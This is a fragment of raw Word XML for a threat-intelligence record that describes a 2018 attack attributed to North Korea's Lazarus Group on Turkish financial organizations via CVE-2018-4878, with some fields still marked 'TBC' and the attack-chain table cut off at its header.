            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="564C72F2" w14:textId="77777777" w:rsidR="00C37023" w:rsidRPr="007328DE" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">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4DE288F4" w14:textId="77777777" w:rsidR="00C37023" w:rsidRPr="00387DCC" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C37023" w:rsidRPr="00B857D7" w14:paraId="20578D43" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D503EA9" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A80AD9C" w14:textId="0030FC83" w:rsidR="00C37023" w:rsidRPr="007328DE" w:rsidRDefault="008C580D" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>North Korea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3591402B" w14:textId="77777777" w:rsidR="00C37023" w:rsidRPr="00387DCC" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C37023" w:rsidRPr="00B857D7" w14:paraId="19BDD4E4" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59D2FC6F" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E2B17E7" w14:textId="3F3E033C" w:rsidR="00C37023" w:rsidRDefault="00205C19" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Turkey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2640A9C6" w14:textId="21FCF6E0" w:rsidR="00C37023" w:rsidRPr="00387DCC" w:rsidRDefault="00205C19" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C37023" w:rsidRPr="00B857D7" w14:paraId="318094C9" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="229CFF01" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BEF8A79" w14:textId="72B1AD03" w:rsidR="00C37023" w:rsidRDefault="00205C19" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="00205C19">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>inancial organizations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FA03E3E" w14:textId="1C2C0B59" w:rsidR="00C37023" w:rsidRPr="00387DCC" w:rsidRDefault="00205C19" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C37023" w:rsidRPr="00B857D7" w14:paraId="0C18855B" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CD8A8B4" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ECCD863" w14:textId="3A20C644" w:rsidR="00C37023" w:rsidRPr="00FA3F0D" w:rsidRDefault="00205C19" w:rsidP="00B02EC5">
            <w:r>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6395FD05" w14:textId="6D4E04BA" w:rsidR="00C37023" w:rsidRDefault="00205C19" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] Access to finances or information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C37023" w:rsidRPr="00B857D7" w14:paraId="3486DB24" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23C0B40D" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32C80ED8" w14:textId="7225C4C0" w:rsidR="00C37023" w:rsidRDefault="005E0C97" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E0C97">
              <w:t>CVE-2018-4878</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FEE502E" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C37023" w:rsidRPr="00B857D7" w14:paraId="692B00CD" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3491B32B" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54935036" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32790E6C" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="518FA731" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20388722" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33A4DF25" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57116655"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0F9B9419" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F0DD440" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20945FBD" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="772989E2" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C37023" w:rsidRPr="00B857D7" w14:paraId="14157123" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31CAA1D3" w14:textId="57B00EAD" w:rsidR="00C37023" w:rsidRDefault="001A38DD" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45AEDDF7" w14:textId="6025F193" w:rsidR="00C37023" w:rsidRDefault="001A38DD" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60861D0D" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A38DD" w:rsidRPr="00B857D7" w14:paraId="7210C2E8" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FDF34BB" w14:textId="77777777" w:rsidR="001A38DD" w:rsidRDefault="001A38DD" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50F69F0F" w14:textId="77777777" w:rsidR="001A38DD" w:rsidRDefault="001A38DD" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2040D3F9" w14:textId="77777777" w:rsidR="001A38DD" w:rsidRDefault="001A38DD" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15A21765" w14:textId="50D0E75E" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00C37023"/>
    <w:p w14:paraId="7948E360" w14:textId="7C47DF18" w:rsidR="001A38DD" w:rsidRDefault="001A38DD" w:rsidP="00C37023"/>
    <w:p w14:paraId="6C469A6C" w14:textId="77777777" w:rsidR="001A38DD" w:rsidRPr="00AC7A85" w:rsidRDefault="001A38DD" w:rsidP="00C37023"/>
    <w:p w14:paraId="066842B4" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00C37023">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9918" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1953"/>
        <w:gridCol w:w="2462"/>
        <w:gridCol w:w="663"/>
        <w:gridCol w:w="591"/>
        <w:gridCol w:w="555"/>
        <w:gridCol w:w="988"/>
        <w:gridCol w:w="2266"/>
      </w:tblGrid>
      <w:tr w:rsidR="006115B2" w:rsidRPr="002D1D50" w14:paraId="0AC2F4D5" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="68D3B207" w14:textId="77777777" w:rsidR="006115B2" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1C61B10E" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6AD218E3" w14:textId="465FBB11" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Lazarus_Group_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="19119C27" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="42ABC058" w14:textId="3DC5510F" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="009F47C1" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="687073C0" w14:textId="7CC48974" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="009F47C1" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="53A035FF" w14:textId="5CCABAE3" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="44444975" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="002D1D50" w14:paraId="72F7BD26" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7437555C" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09D29D4A" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FE8E4E4" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54A1E3D5" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D9E905E" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52F61380" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61AE3686" w14:textId="081CC674" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="736E8BD7" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="002D1D50" w14:paraId="2A954B07" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2520595C" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6510F051" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
